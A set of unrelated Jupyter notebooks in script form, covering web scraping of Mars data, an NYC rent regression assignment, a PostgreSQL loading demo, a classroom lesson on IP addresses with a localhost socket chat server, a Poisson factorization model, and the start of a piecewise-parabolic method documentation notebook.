    print("Params", clf.get_params())
    print("{} Classifier score on training set: {}".format(clf_label, clf.score(X_train, y_train)))
    print("{} Classifier score on validation set: {}".format(clf_label, clf.score(X_test, y_test)))
    print("{} Classifier correctly predicted: {}".format(clf_label, accuracy_score(y_test, predicted, normalize=True)))
    print("{} F1-score for validation set: {}".format(clf_label, f1_score(y_test, predicted)))
    print("{} Classifier time needed to train: {}".format(clf_label, t1-t0))
    print()
# -
X_user_0 = X.getrow(0)
X_user_0.todense()
y_user_0 = y.tolist()[0]
y_user_0
clf.predict_proba(X_user_0)
|
ModelosPredictivos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Dependencies and Setup
from bs4 import BeautifulSoup as bs
from splinter import Browser
import pandas as pd
import requests
import time
# # Mac Users
# Show path that we will be using
# https://splinter.readthedocs.io/en/latest/drivers/chrome.html
# !which chromedriver
# ## NASA Mars News
# Choose the executable path to driver
executable_path = {"executable_path": "/usr/local/bin/chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
# Visit Nasa news url through splinter module
url_news = "https://mars.nasa.gov/news/"
browser.visit(url_news)
# +
# HTML Object
html_news = browser.html
soup = bs(html_news, "html.parser")
# Scrape the latest News Title and Paragraph Text
news_title = soup.find("div", class_ = "content_title").text
news_paragraph = soup.find("div", class_ = "article_teaser_body").text
# Display scrapped news
print(news_title)
print("-----------------------------------------")
print(news_paragraph)
# -
# ________________________________________________________________________
# ## JPL Mars Space Images - Featured Image
# Visit JPL Featured Space Image url through splinter module
url_spaceimage = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
browser.visit(url_spaceimage)
# HTML Object
img_html = browser.html
img_soup = bs(img_html, "html.parser")
# +
# Find image url to the full size
featured_image = img_soup.find("article")["style"].replace('background-image: url(','').replace(');', '')[1:-1]
# Display url of the full image
featured_image_url = f"https://www.jpl.nasa.gov{featured_image}"
print("JPL Featured Space Image")
print("-----------------------------------------")
print(featured_image_url)
# -
# ________________________________________________________________________
#
#
# ## Mars Weather
# +
# Visit Mars Weather twitter through splinter
url_weather = "https://twitter.com/marswxreport?lang=en"
browser.visit(url_weather)
# HTML Object
weather_html = browser.html
weather_soup = bs(weather_html, "html.parser")
# -
# +
# Scrape the latest Mars weather tweet from the page
weather = weather_soup.find("p", class_="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text")
# Remove the anchor from paragraph
weather.a.decompose()
weather = weather.text
# +
# Clean up the text
mars_weather = weather.replace(" \n", '')
# Display Mars Weather
print("Mars Weather")
print("-----------------------------------------")
print(mars_weather)
# -
# ________________________________________________________________________
# ## Mars Facts
# +
# Visit the Mars Facts webpage and use Pandas to scrape the table
url_facts = "https://space-facts.com/mars/"
# Use Pandas - read_html - to scrape tabular data from a page
mars_facts = pd.read_html(url_facts)
mars_facts
# +
mars_df = mars_facts[0]
# Create Data Frame
mars_df.columns = ["Description", "Value"]
# Set index to Description
mars_df.set_index("Description", inplace=True)
# Print Data Frame
mars_df
# +
# Save html code to folder Assets
html_table = mars_df.to_html()
# Strip unwanted newlines to clean up the table
html_table = html_table.replace("\n", '')  # str.replace returns a new string; keep the result
# Save html code
mars_df.to_html("mars_facts_data.html")
# -
# ________________________________________________________________________
# ## Mars Hemispheres
# Visit the USGS Astrogeology Science Center url through splinter
url_hemisphere = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
browser.visit(url_hemisphere)
# HTML Object
html_hemisphere = browser.html
soup = bs(html_hemisphere, "html.parser")
# +
# Scrape all items that contain mars hemispheres information
hemispheres = soup.find_all("div", class_="item")
# Create empty list
hemispheres_info = []
# Assign main url for loop
hemispheres_url = "https://astrogeology.usgs.gov"

# Loop through the list of all hemispheres information
for i in hemispheres:
    title = i.find("h3").text
    hemispheres_img = i.find("a", class_="itemLink product-item")["href"]

    # Visit the link that contains the full image website
    browser.visit(hemispheres_url + hemispheres_img)

    # HTML Object
    image_html = browser.html
    web_info = bs(image_html, "html.parser")

    # Create full image url
    img_url = hemispheres_url + web_info.find("img", class_="wide-image")["src"]

    hemispheres_info.append({"title" : title, "img_url" : img_url})

    # Display each title and image url
    # (alternatively, inspect hemispheres_info after the loop)
    print("")
    print(title)
    print(img_url)
    print("-----------------------------------------")
# -
|
mission_to_mars.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/marilynle/DS-Unit-2-Linear-Models/blob/master/module2-regression-2/Marilyn_L_E_Assignment_Regression_Classification_2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="wneJzIVyYAgj" colab_type="text"
# Lambda School Data Science
#
# *Unit 2, Sprint 1, Module 2*
#
# ---
# + [markdown] colab_type="text" id="7IXUfiQ2UKj6"
# # Regression 2
#
# ## Assignment
#
# You'll continue to **predict how much it costs to rent an apartment in NYC,** using the dataset from renthop.com.
#
# - [ ] Do train/test split. Use data from April & May 2016 to train. Use data from June 2016 to test.
# - [ ] Engineer at least two new features. (See below for explanation & ideas.)
# - [ ] Fit a linear regression model with at least two features.
# - [ ] Get the model's coefficients and intercept.
# - [ ] Get regression metrics RMSE, MAE, and $R^2$, for both the train and test data.
# - [ ] What's the best test MAE you can get? Share your score and features used with your cohort on Slack!
# - [ ] As always, commit your notebook to your fork of the GitHub repo.
#
#
# #### [Feature Engineering](https://en.wikipedia.org/wiki/Feature_engineering)
#
# > "Some machine learning projects succeed and some fail. What makes the difference? Easily the most important factor is the features used." — <NAME>, ["A Few Useful Things to Know about Machine Learning"](https://homes.cs.washington.edu/~pedrod/papers/cacm12.pdf)
#
# > "Coming up with features is difficult, time-consuming, requires expert knowledge. 'Applied machine learning' is basically feature engineering." — <NAME>, [Machine Learning and AI via Brain simulations](https://forum.stanford.edu/events/2011/2011slides/plenary/2011plenaryNg.pdf)
#
# > Feature engineering is the process of using domain knowledge of the data to create features that make machine learning algorithms work.
#
# #### Feature Ideas
# - Does the apartment have a description?
# - How long is the description?
# - How many total perks does each apartment have?
# - Are cats _or_ dogs allowed?
# - Are cats _and_ dogs allowed?
# - Total number of rooms (beds + baths)
# - Ratio of beds to baths
# - What's the neighborhood, based on address or latitude & longitude?
#
# ## Stretch Goals
# - [ ] If you want more math, skim [_An Introduction to Statistical Learning_](http://faculty.marshall.usc.edu/gareth-james/ISL/ISLR%20Seventh%20Printing.pdf), Chapter 3.1, Simple Linear Regression, & Chapter 3.2, Multiple Linear Regression
# - [ ] If you want more introduction, watch [<NAME>, Statistics 101: Simple Linear Regression](https://www.youtube.com/watch?v=ZkjP5RJLQF4)
# (20 minutes, over 1 million views)
# - [ ] Add your own stretch goal(s) !
# + colab_type="code" id="o9eSnDYhUGD7" colab={}
# %%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
    DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Applied-Modeling/master/data/'
    # !pip install category_encoders==2.*

# If you're working locally:
else:
    DATA_PATH = '../data/'
# Ignore this Numpy warning when using Plotly Express:
# FutureWarning: Method .ptp is deprecated and will be removed in a future version. Use numpy.ptp instead.
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning, module='numpy')
# + colab_type="code" id="cvrw-T3bZOuW" colab={}
import numpy as np
import pandas as pd
# Read New York City apartment rental listing data
df = pd.read_csv(DATA_PATH+'apartments/renthop-nyc.csv')
assert df.shape == (49352, 34)
# Remove the most extreme 1% prices,
# the most extreme .1% latitudes, &
# the most extreme .1% longitudes
df = df[(df['price'] >= np.percentile(df['price'], 0.5)) &
        (df['price'] <= np.percentile(df['price'], 99.5)) &
        (df['latitude'] >= np.percentile(df['latitude'], 0.05)) &
        (df['latitude'] < np.percentile(df['latitude'], 99.95)) &
        (df['longitude'] >= np.percentile(df['longitude'], 0.05)) &
        (df['longitude'] <= np.percentile(df['longitude'], 99.95))]
# + id="avw7hptZ8k2E" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="ff8a039d-6ce3-4259-a4b6-d4ad7cd03eed"
# Exploring the data
df.head()
# + id="XMKH8vyo8k6P" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="b5141bb6-51eb-43ac-f940-0fa8c5b5ffde"
# Checking for null values
df.isnull().sum()
# + id="eaZN9_5k94vw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="1b9d1289-1d47-4ff1-c27f-174f912f737f"
# Dropping NaN and checking
df = df.dropna()
df.isnull().sum()
# + id="oEOtKK7lmA-W" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="3f7a9b31-2106-4d9e-ae08-78a148f5fcdf"
df.dtypes
# + id="8s7U5se9de1V" colab_type="code" colab={}
# Engineer at least two new features.
# + id="w_teQocZde5Y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="eebc08f4-0239-4556-e903-3a5711a5b719"
# Are cats or dogs allowed?
# Creating feature cats_or_dogs
df['cats_or_dogs'] = (df.cats_allowed.eq(1)) | (df.dogs_allowed.eq(1))
df.head()
# + id="I08yt7NNde93" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="6aa37cc6-62f5-45ef-d406-163c934a1361"
# Are cats and dogs allowed?
# Creating feature cats_and_dogs
df['cats_and_dogs'] = (df['cats_allowed']== 1) & (df['dogs_allowed']== 1)
df.head()
# + id="_ChmpKpffeGm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 581} outputId="adf8e1a9-a1be-466c-f62c-0f1efcf69151"
df['cats_or_dogs']= df['cats_or_dogs'].replace({False:int(0),True:int(1)})
df['cats_and_dogs'] = df['cats_and_dogs'].replace({False:int(0),True:int(1)})
df.sample(5)
# + id="Zmn-HUE_-boD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="2ffb1846-6326-46b6-a57e-cb26eda44f85"
# Do train/test split. Use data from April & May 2016 to train. Use data from June 2016 to test.
train = df[df['created'].str.contains('2016-04|2016-05')]
test = df[df['created'].str.contains('2016-06')]
train.head()
# + id="BBLB0Pl7zWdZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="4e1dfc96-ea15-4c0c-9c02-24a5a9bdb0bf"
test.head()
# + id="E6NlAK7gzuCu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8ebc66ec-9c0d-45eb-cc08-d2ccd18bf7f5"
train.shape, test.shape
# + id="68o_jBjo0AuL" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="2834c543-b622-4c09-d66a-777988c7b562"
# Fit a linear regression model with at least two features.
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
model = LinearRegression()
# Arrange y target vectors
target = 'price'
y_train = train[target]
y_test = test[target]
# Arrange X features matrices
features = ['bedrooms','cats_and_dogs']
X_train = train[features]
X_test = test[features]
print(f'Linear Regression, dependent on: {features}')
# Fit the model
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
# Get regression metrics RMSE, MAE, and R2 # train data.
mse = mean_squared_error(y_train, y_pred)
rmse = np.sqrt(mse)
mae = mean_absolute_error(y_train, y_pred)
r2 = r2_score(y_train, y_pred)
print(f'Train Mean Squared Error: {mse:.2f}')
print(f'Train Root Mean Squared Error: {rmse:.2f}')
print(f'Train Mean Absolute Error: {mae:.2f}')
print(f'Train R^2: {r2:.2f}')
# Apply the model to new data
y_pred = model.predict(X_test)
# Get regression metrics RMSE, MAE, and R2 # test data.
mse = mean_squared_error(y_test, y_pred)
rmse = np.sqrt(mse)
mae = mean_absolute_error(y_test, y_pred)
r2 = r2_score(y_test, y_pred)
print(f'Test Mean Squared Error: {mse:.2f}')
print(f'Test Root Mean Squared Error: {rmse:.2f}')
print(f'Test Mean Absolute Error: {mae:.2f}')
print(f'Test R^2: {r2:.2f}')
# + id="L6-fRm2e-pi1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="8c13ef86-dfcd-4376-a42f-1968eb789f06"
# Get the model's coefficients and intercept.
print('Intercept', model.intercept_)
coefficients = pd.Series(model.coef_, features)
print(coefficients.to_string())
# + id="qp9Gtgs20sfN" colab_type="code" colab={}
# Stretch Goals
# scatterplot of the relationship between 2 features and the target.
import itertools
import numpy as np
import plotly.express as px
import plotly.graph_objs as go
def regression_3d(df, x, y, z, num=100, **kwargs):
    """
    Visualize linear regression in 3D: 2 features + 1 target

    df : Pandas DataFrame
    x : string, feature 1 column in df
    y : string, feature 2 column in df
    z : string, target column in df
    num : integer, number of quantiles for each feature
    """

    # Plot data
    fig = px.scatter_3d(df, x, y, z, **kwargs)

    # Fit Linear Regression
    features = [x, y]
    target = z
    model = LinearRegression()
    model.fit(df[features], df[target])

    # Define grid of coordinates in the feature space
    xmin, xmax = df[x].min(), df[x].max()
    ymin, ymax = df[y].min(), df[y].max()
    xcoords = np.linspace(xmin, xmax, num)
    ycoords = np.linspace(ymin, ymax, num)
    coords = list(itertools.product(xcoords, ycoords))

    # Make predictions for the grid
    predictions = model.predict(coords)
    Z = predictions.reshape(num, num).T

    # Plot predictions as a 3D surface (plane)
    fig.add_trace(go.Surface(x=xcoords, y=ycoords, z=Z))

    return fig
# + id="kqq6iWG6RTmb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 617} outputId="8e422c32-986a-4b72-a0f2-26fec182a6fc"
regression_3d(
    train,
    x='bedrooms',
    y='cats_and_dogs',
    z='price',  # z is the target per the docstring; the features go on x and y
    title='Rent an apartment in NYC'
)
|
module2-regression-2/Marilyn_L_E_Assignment_Regression_Classification_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Use a SQL database for clinical data 🧪
#
# Demo to quickly load 400k+ drug-disease associations in a PostgreSQL database on the DSRI with Python, and pandas.
import psycopg2
import pandas as pd
# ## Download the data
#
# From http://snap.stanford.edu/biodata/datasets/10004/10004-DCh-Miner.html using Pandas. We also add `DRUGBANK:` at the start of the Chemical ID to have valid CURIEs (namespace + identifier)
data = pd.read_csv('https://snap.stanford.edu/biodata/datasets/10004/files/DCh-Miner_miner-disease-chemical.tsv.gz', sep='\t', header=0)
data["Chemical"] = data["Chemical"].apply(lambda row: 'DRUGBANK:' + row)
print(data)
data.to_csv('mined-disease-chemical-associations.csv', index=False, header=False)
# ## Load the data in the database
#
# Connect to the PostgreSQL database, and create the table for drug-disease associations in the default database selected by postgres
#
# PostgreSQL client docs: https://www.psycopg.org/docs/usage.html
#
# You can try it locally with docker (you will need to use `host='localhost',`)
#
# ```
# docker run -it --rm -p 5432:5432 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=<PASSWORD> -e POSTGRES_DB=sampledb postgres
# ```
conn = psycopg2.connect(
host='postgresql-demo',
# host='localhost',
# dbname='sampledb',
user='postgres',
password='<PASSWORD>')
cursor = conn.cursor()
cursor.execute("""CREATE TABLE associations(
disease_id VARCHAR(255),
drug_id VARCHAR(255),
PRIMARY KEY (disease_id, drug_id)
);""")
# Load the CSV file in the database `associations` table:
f = open(r'mined-disease-chemical-associations.csv', 'r')
cursor.copy_from(f, 'associations', sep=',')
f.close()
conn.commit()  # commit the transaction so the bulk load is persisted
# +
## Example to load a single row:
# cursor.execute("""INSERT INTO associations(disease_id, drug_id)
# VALUES('MESH:D001523', 'DB00235')
# ;""")
# -
# ## Query the database
#
# You can now run a `SELECT` query:
# + tags=[]
print('Number of associations in the database:')
cursor.execute('SELECT COUNT(*) FROM associations;')
records = cursor.fetchall()
for i in records:
    print(i)
print('\nSample of associations in the database:')
cursor.execute('SELECT disease_id, drug_id FROM associations LIMIT 3;')
records = cursor.fetchall()
for i in records:
    print(i)
# -
# ## What's next?
#
# * You can also connect to the PostgreSQL database using the terminal:
#
# ```
# sudo apt install postgresql
# psql -h postgresql-demo -U postgres
# ```
# * Setup a [pgAdmin](https://www.pgadmin.org/docs/pgadmin4/latest/container_deployment.html) user interface to manage the database
# * Take a look into visualization tools to explore your database, such as Apache Superset.
|
postgresql.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Python 7 - Discovering networks and servers
#
# > a basic server socket application
#
# - toc: true
# - badges: true
# - comments: false
# - categories: [ISN, socket]
# ## Part I: Network addresses
# On a network, every computer has an address called an IP (Internet Protocol) address.
# "Internet Protocol" is a mechanism invented for the Internet, but it is now used on practically every network, including small home networks.
#
# On the Internet, every machine connected to the network (computer, phone, ...) has a unique "IP address". This address is made up of 4 octets.
# 1) How many machines can be connected to the Internet?
#
# Answer here...
# 2) This protocol (named IPv4) has clearly reached its limits. A new protocol, named IPv6, is being rolled out on the Internet. It uses 128-bit addresses.
# How many machines will be able to connect simultaneously thanks to this new protocol?
#
# Answer here...
# 3) Open a terminal and type the command $\fbox{/sbin/ifconfig}$
#
# a. What is your IP address? ...
#
# b. What is your neighbor's IP address? ...
#
# c. Which part do your IP address and your neighbor's have in common? ...
#
# d. You can try to communicate with your neighbor via the command
# $\fbox{ping Your.Neighbors.Ip.Address}$ in the terminal. What do you get?
# ## Part II: Names on the Internet
# Computers use IP addresses, but humans rarely memorize them: we prefer to use names.
#
# Every computer can have one - or several - names. On a network, some computers exist solely to keep the correspondence tables between IP addresses and names up to date, in a kind of directory similar to a phone book: the name servers (*DNS* for short)
# 1) In a terminal, type $\fbox{ping lcs}$ then $\fbox{ping google.fr}$ .
# 2) What is the IP address of the Lcs?
#
# Answer here ...
# 3) What is the IP address of google.fr?
#
# Answer here ...
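# The name-to-address lookup that a DNS performs can be tried directly from Python using the
# standard `socket` module (a sketch; `localhost` is just an example hostname):

# +
import socket

# Resolve a hostname to an IPv4 address, much like `ping` does before sending packets
ip = socket.gethostbyname("localhost")
print(ip)  # typically 127.0.0.1
# -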
# ## Part III: The client/server communication principle
# One computer (the ***server***) permanently runs a program (a ***service***) that
# - waits for other computers (the ***clients***) to contact it
# - manages the exchanges once the connection is established
# 1) Give examples of client/server communication in your everyday use of networks.
#
# Your answer here ...
# 2) For these examples, describe the role of the server and of the client.
#
# Your answer here
# ## Part IV: Writing a server program in Python
# Here is a basic server program written in Python. It uses the ***socket*** library, which handles network communication in Python.
#
# Run this cell, then open the notebook **Python7 - Reseau client** to run the client side.
#
# Note that while the server is running, the Python kernel is monopolized and no other cell can run, hence the need to switch notebooks for the client side.
#
# You can nevertheless work through the next section on understanding the program and answer its questions while the server is running.
# ### The server program
# +
from socket import *

### Setting up the service ########
MON_IP, PORT = '127.0.0.1', 50000
service = socket(AF_INET, SOCK_STREAM)
try:
    service.bind((MON_IP, PORT))
    tourne = True
except error:
    print("Unable to start the service.")
    tourne = False

while tourne:
    print("Server ready, waiting for requests ...")
    service.listen(1)

    ### Setting up a connection ########
    connexion, adresse = service.accept()
    print("Client connected: ", adresse[0])

    ### Dialogue with the client ########
    message = ""
    while message.upper() != "FIN":
        message = input("me > ")
        connexion.send(message.encode("utf8"))
        if message.upper() != "FIN":
            message = connexion.recv(1024).decode("utf8")
            print("client > ", message)
    connexion.close()

    ch = input("<R>estart <T>erminate ? ")
    ch = ch[0].upper()
    if ch == 'T':
        tourne = False

service.close()
# -
# ### Understanding the server program
# 1) On which IP address will the server respond?
#
# Your answer ...
# 2) A single machine can host several services (server programs). The Lcs, for instance, hosts a web server, a database server, mail services, and so on. To keep these services from conflicting, a port number is used in addition to the IP address; it can be seen as a communication channel. This port number lies between 1024 and 65535.
#
# a. Which port number is used in the program under study? ...
#
# b. Change the port number on the server. What happens on the client side? ...
#
# c. Also adapt the port number on the client. Does the program work again? ...
# 3) Which command on the server is responsible for sending the message to the client?
#
# Your answer ...
# 4) Write, in plain language, the algorithm corresponding to the server
#
# Your answer ...
# 5) Which message should be typed on the client or server side to end the communication?
#
# Your answer ...
# # Your turn: a networked "guess the price" game
# The goal of this activity is to build a price-guessing game over the network.
#
# 1) Describe the role of the server and of the client.
#
# Your answer ...
# 2) Write, in plain language, the algorithm of a networked price-guessing game. To do this, write both the server's and the client's algorithm.
# 3) Using the commands seen in the example studied, modify the server program above to implement a networked price-guessing game. You could try to guess an integer between 1 and 100.
# +
# Your program here...
# -
|
_notebooks/2020-03-07-Python7 - Reseau serveur.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:bml]
# language: python
# name: conda-env-bml-py
# ---
import edward as ed
from edward.models import Poisson,Gamma
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import helper_func
import math
import models
import scipy.special as sp
from scipy.special import logsumexp  # moved out of scipy.misc in newer SciPy releases
import gc
sess = tf.InteractiveSession()
init = tf.global_variables_initializer()
init.run()
dataset = 'bibx'
full_X,x,test_mask1 = helper_func.load_data(dataset)
dataset = 'biby'
full_Y,y,test_mask2 = helper_func.load_data(dataset)
metric = 'mae_nz_all'
x = full_X #*x_train_mask
y = full_Y #*y_train_mask
tot = 100
tot += 1
test_every = 20
non_zero_x = helper_func.non_zero_entries(x)
non_zero_y = helper_func.non_zero_entries(y)
no_sample = 20
score = []
K = 50
users = full_X.shape[0]
items1 = full_X.shape[1]
items2 = full_Y.shape[1]
param1 = models.hpf(users,items1)
param2 = models.hpf(users,items2)
a = a_c = c = c_c = 0.3
b_c = d_c = 1.0
# +
kappa_shp = np.random.uniform(low=0.1,size=users)
kappa_rte = np.random.uniform(low=0.1,size=users)
tau_shp = np.random.uniform(low=0.1,size=items1)
tau_rte = np.random.uniform(low=0.1,size=items1)
rho_shp = np.random.uniform(low=0.1,size=items2)
rho_rte = np.random.uniform(low=0.1,size=items2)
phi = np.zeros([users,items1,K])
ohm = np.zeros([users,items2,K])
gam_shp = np.random.uniform(low=0.1,size=[users,K])
gam_rte = np.random.uniform(low=0.1,size=[users,K])
lam_shp = np.random.uniform(low=0.1,size=[items1,K])
lam_rte = np.random.uniform(low=0.1,size=[items1,K])
mu_shp = np.random.uniform(low=0.1,size=[items2,K])
mu_rte = np.random.uniform(low=0.1,size=[items2,K])
# +
for u in range(0,users):
    kappa_shp[u] = a_c + K*a
for i in range(0,items1):
    tau_shp[i] = c_c + K*c
for j in range(0,items2):
    rho_shp[j] = c_c + K*c

for ite in range(0,tot):
    print(ite)
    for ui in non_zero_x:
        u = ui[0]
        i = ui[1]
        phi[u,i,:] = sp.digamma(gam_shp[u,:])-np.log(gam_rte[u,:])+sp.digamma(lam_shp[i,:])-np.log(lam_rte[i,:])
        norm = logsumexp(phi[u,i,:])
        phi[u,i,:] = np.exp(phi[u,i,:]-norm)
    for uj in non_zero_y:
        u = uj[0]
        j = uj[1]
        ohm[u,j,:] = sp.digamma(gam_shp[u,:])-np.log(gam_rte[u,:])+sp.digamma(mu_shp[j,:])-np.log(mu_rte[j,:])
        norm = logsumexp(ohm[u,j,:])
        ohm[u,j,:] = np.exp(ohm[u,j,:]-norm)
    for u in range(0,users):
        for k in range(0,K):
            gam_shp[u,k] = a + np.inner(x[u,:],phi[u,:,k]) + np.inner(y[u,:],ohm[u,:,k])
            gam_rte[u,k] = (kappa_shp[u]/kappa_rte[u]) + np.sum(lam_shp[:,k]/lam_rte[:,k]) + np.sum(mu_shp[:,k]/mu_rte[:,k])
        kappa_rte[u] = (a_c/b_c) + np.sum(gam_shp[u,:]/gam_rte[u,:])
    for i in range(0,items1):
        for k in range(0,K):
            lam_shp[i,k] = c + np.inner(x[:,i],phi[:,i,k])
            lam_rte[i,k] = (tau_shp[i]/tau_rte[i]) + np.sum(gam_shp[:,k]/gam_rte[:,k])
        tau_rte[i] = (c_c/d_c) + np.sum(lam_shp[i,:]/lam_rte[i,:])
    for j in range(0,items2):
        for k in range(0,K):
            mu_shp[j,k] = c + np.inner(y[:,j],ohm[:,j,k])
            mu_rte[j,k] = (rho_shp[j]/rho_rte[j]) + np.sum(gam_shp[:,k]/gam_rte[:,k])
        rho_rte[j] = (c_c/d_c) + np.sum(mu_shp[j,:]/mu_rte[j,:])
    if ite%test_every == 0:
        q_theta = Gamma(gam_shp,gam_rte)
        q_beta1 = Gamma(np.transpose(lam_shp),np.transpose(lam_rte))
        q_beta2 = Gamma(np.transpose(mu_shp),np.transpose(mu_rte))
        beta1_sample = q_beta1.sample(no_sample).eval()
        beta2_sample = q_beta2.sample(no_sample).eval()
        theta_sample = q_theta.sample(no_sample).eval()
        score.append(helper_func.check(param1,theta_sample,beta1_sample,test_mask1,full_X,metric=metric) \
                     +helper_func.check(param2,theta_sample,beta2_sample,test_mask2,full_Y,metric=metric))
        gc.collect()
# +
# to_save = [[gam_shp,gam_rte],[lam_shp,lam_rte],[mu_shp,mu_rte]]
# PIK = "../models/bibtex_hpf_"+str(K)+".dat"
# with open(PIK, "wb") as f:
# pickle.dump(to_save, f)
# +
#check(0)
# -
plt.plot(score)
plt.show()
# np.savetxt("mae_d_k05.txt",mae_val)
|
algos/.ipynb_checkpoints/hpf_dual-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # The Piecewise-Parabolic Method
#
# This notebook documents the function from the original `GiRaFFE` that implements the reconstruction algorithm used by the piecewise-parabolic method (PPM) of [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf).
#
# The differential equations that `GiRaFFE` evolves have two different terms that contribute to the time evolution of some quantity: the flux term and the source term. The PPM method is what the original `GiRaFFE` uses to handle the flux term; hopefully, using this instead of finite-differencing will fix some of the problems we've been having with `GiRaFFE_HO`.
#
# This algorithm is not quite as accessible as the much simpler finite-difference methods; as such, [this notebook](https://mybinder.org/v2/gh/python-hydro/how_to_write_a_hydro_code/master) is recommended as an introduction. It covers a simpler reconstruction scheme, and proved useful in preparing the documentation for this more complicated scheme.
#
# The algorithm for finite-volume methods in general is as follows:
#
# 1. **The Reconstruction Step (This notebook)**
# 1. **Within each cell, fit to a function that conserves the volume in that cell using information from the neighboring cells**
# * **For PPM, we will naturally use parabolas**
# 1. **Use that fit to define the state at the left and right interface of each cell**
# 1. **Apply a slope limiter to mitigate Gibbs phenomenon**
# 1. Solving the Riemann Problem
# 1. Use the left and right reconstructed states to calculate the unique state at boundary
# 1. Use the unique state to estimate the derivative in the cell
# 1. Repeat the above for each conservative gridfunction in each direction
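# Before diving into the full PPM machinery, the reconstruct-then-limit idea can be illustrated
# with the simpler piecewise-linear (minmod) scheme: fit a limited slope in each cell, then
# evaluate it at the cell faces. This is a sketch for intuition only (the function names are
# ours), not the algorithm implemented below.

# +
import numpy as np

def minmod(a, b):
    # Pick the smaller-magnitude slope; return 0 at extrema to suppress oscillations
    return np.where(a*b > 0.0, np.where(np.abs(a) < np.abs(b), a, b), 0.0)

def reconstruct_faces(u):
    # Piecewise-linear reconstruction: left/right face states for each interior cell
    slope = minmod(u[1:-1] - u[:-2], u[2:] - u[1:-1])
    u_left  = u[1:-1] - 0.5*slope  # state at each interior cell's left face
    u_right = u[1:-1] + 0.5*slope  # state at each interior cell's right face
    return u_left, u_right

u_demo = np.array([0.0, 0.0, 1.0, 2.0, 2.0])
print(reconstruct_faces(u_demo))  # slopes are limited to 0 next to the flat regions
# -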
# <a id='toc'></a>
#
# # Table of Contents
# $$\label{toc}$$
#
# This notebook is organized as follows
#
# 0. [Step 0](#prelim): Preliminaries
# 1. [Step 1](#reconstruction): The reconstruction function
# 1. [Step 1.a](#define): Some definitions and declarations
# 1. [Step 1.b](#func): The function definition
# 1. [Step 1.c](#face): Interpolate the face values
# 1. [Step 1.d](#monotonize): Monotonize the values within each cell
# 1. [Step 1.e](#shift): Shift indices
# 1. [Step 2](#slope_limit): The slope limiter
# 1. [Step 3](#monotonize_def): The monotonization algorithm
# 1. [Step 4](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
# <a id='prelim'></a>
#
# ## Step 0: Preliminaries \[Back to [top](#toc)\]
# $$\label{prelim}$$
#
# This first block of code just sets up a subdirectory within `GiRaFFE_standalone_Ccodes/` to which we will write the C code.
import cmdline_helper as cmd
import os
outdir = "GiRaFFE_standalone_Ccodes/PPM"
cmd.mkdir(os.path.join(outdir,"/"))
# When we convert the code to work with NRPy+, we will be able to make a simplification: since `GiRaFFE_HO` does not use staggered grids, we will be able to skip reconstructing the staggered quantities.
#
# The structure `gf_and_gz_struct` is a C++ structure used to keep track of ghostzone information between routines. It contains a pointer and two arrays. It is specified by the following code:
#
# ```c
# // Keeping track of ghostzones between routines is a nightmare, so
# // we instead attach ghostzone info to each gridfunction and set
# // the ghostzone information correctly within each routine.
# struct gf_and_gz_struct {
# REAL *gf;
# int gz_lo[4],gz_hi[4];
# };
# ```
